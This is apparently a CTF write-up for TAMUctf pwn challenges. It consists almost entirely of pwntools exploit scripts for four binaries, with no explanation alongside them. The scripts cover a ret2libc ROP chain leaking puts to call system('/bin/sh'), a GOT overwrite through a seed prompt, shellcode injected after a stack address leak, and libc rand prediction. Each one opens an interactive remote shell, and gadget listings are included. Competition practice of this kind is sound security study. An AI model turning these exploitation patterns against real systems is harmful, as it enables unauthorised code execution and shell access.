TAMU wp

PWN:

inspector-gadget:

exp:

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

# io=process("./inspector-gadget")
io=remote("tamuctf.com", 443, ssl=True, sni="inspector-gadget")
elf=ELF("./inspector-gadget")
libc=ELF("./libc.so")

me=0x4011a3
pop_rdi_ret=0x40127b
puts_plt=elf.plt[b"puts"]
puts_got=elf.got[b"puts"]

io.recvuntil(b"pwn me\n")
payload=cyclic(0x18)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(me)
io.sendline(payload)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-libc.sym[b"puts"]
print("leak_addr:  "+hex(leak_addr))

sys_addr=leak_addr+libc.sym[b"system"]
str_bin_sh=leak_addr+next(libc.search(b"/bin/sh"))
payload=cyclic(0x18)+p64(pop_rdi_ret)+p64(str_bin_sh)+p64(sys_addr)

io.recvuntil(b"pwn me\n")
io.sendline(payload)

io.interactive()

# Gadgets information
# ============================================================
# 0x0000000000401274 : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401276 : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401278 : pop r14 ; pop r15 ; ret
# 0x000000000040127a : pop r15 ; ret
# 0x0000000000401273 : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401277 : pop rbp ; pop r14 ; pop r15 ; ret
# 0x0000000000401129 : pop rbp ; ret
# 0x000000000040127b : pop rdi ; ret
# 0x0000000000401279 : pop rsi ; pop r15 ; ret
# 0x0000000000401275 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000401016 : ret

# Unique gadgets found: 11

randomness：

exp:

from pwn import *
from ctypes import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

# io=process("./randomness")
io = remote("tamuctf.com", 443, ssl=True, sni="randomness")
cs=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

puts_got=0x403448
win=0x4011d3

io.recvuntil(b"seed:\n")
io.sendline(str(puts_got))
cs.srand(0)

# gdb.attach(io)
# pause()

io.recvuntil(b"guess:\n")
# io.sendline(str(cs.rand()))
payload=str(win)
io.sendline(payload)

io.interactive()

sea-shells:

exp:

from pwn import *
from ctypes import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

# io=process("./sea-shells")
io = remote("tamuctf.com", 443, ssl=True, sni="sea-shells")
cs=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
# sc=b"\x50\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
sc=asm(shellcraft.sh())

io.recvuntil(b"1st number: ")
io.sendline(b"0")

io.recvuntil(b"2nd number: ")
io.sendline(b"0")

io.recvuntil(b"3rd number: ")
io.sendline(b"0")

io.recvuntil(b"4th number: ")
io.sendline(str(cs.rand()))

io.recvuntil(b"work: ")
leak_addr=int(io.recv(12),16)
print("leak_addr:  "+hex(leak_addr))

# gdb.attach(io)
# pause()

io.recvuntil(b"again? (y/n) ")
# io.sendline(b"n")

payload=b"n"+p64(0)+p64(0)+p64(leak_addr+0x40)+sc
io.sendline(payload)

io.interactive()

# Gadgets information
# ============================================================
# 0x000000000000131d : leave ; ret
# 0x0000000000001424 : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000001426 : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000001428 : pop r14 ; pop r15 ; ret
# 0x000000000000142a : pop r15 ; ret
# 0x0000000000001423 : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000001427 : pop rbp ; pop r14 ; pop r15 ; ret
# 0x000000000000115f : pop rbp ; ret
# 0x000000000000142b : pop rdi ; ret
# 0x0000000000001429 : pop rsi ; pop r15 ; ret
# 0x0000000000001425 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000001016 : ret
# 0x0000000000001072 : ret 0x2f
# 0x000000000000128a : ret 0x8948

# Unique gadgets found: 14

unlucky:

exp:

from pwn import *
from ctypes import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

while True:
    try:
        # io=process("./unlucky")
        io = remote("tamuctf.com", 443, ssl=True, sni="unlucky")
        elf=ELF("./unlucky")
        cs=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
        # gdb.attach(io)
        # pause()
        io.recvuntil(b": ")
        seed_addr=int(io.recv(15),16)
        print("seed_addr: "+hex(seed_addr))
        seed_addr+=0x2ec3
        # num=c_int(69)
        # seed_addr = addressof(num)
        print("seed_addr: "+hex(seed_addr))
        
        cs.srand(seed_addr)
        for i in range(7):
            io.recvuntil(b":\n")
            io.sendline(str(cs.rand()))
        
        io.recvline()
        io.interactive()
    except:
        io.close()
        continue

PWN:

inspector-gadget:

randomness：

sea-shells:

unlucky:

感谢您的支持，我会继续努力的!